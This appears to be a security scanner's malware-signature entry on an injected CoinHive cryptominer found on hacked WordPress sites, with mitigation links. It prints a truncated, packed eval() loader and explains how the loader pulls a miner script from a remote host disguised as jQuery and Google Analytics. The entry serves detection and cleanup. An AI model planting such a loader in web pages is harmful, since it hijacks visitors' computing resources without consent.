Description:
Website contains an encrypted CoinHive JavaScript miner library, which usually means that it's used without webmaster's consent.
eval(function(p,a,c,k,e,r){e=function(c)...skipped...document|google_analytics|function|var|type|text|javascript|5000|addScript|getElementsByTagName|body|appendChild|setTimeout|createElement|stats|11|3104709642|lib|jquery|onload|src|innerHTML|min|new|googleanalytics|Anonymous||NPRak9QU4lFBSneFt23qEIChh5r0SZev|start|http|window|js'.split('|'),0,{}))
This code injects a script from hxxp:// 3104709642/lib/jquery-3.2.1.min.js?v=3.2.11 that loads the CoinHive JavaScript miner under disguise of Google Analytics.
More information:
Microsoft Malware Protection Center notice.
Fake jQuery and Google Analytics Hide Yet Another Cryptominer
This infection usually comes along with the cloudflare.solutions WordPress keylogger.
Affecting: Mostly WordPress sites
Mitigation How to clean a hacked WordPress site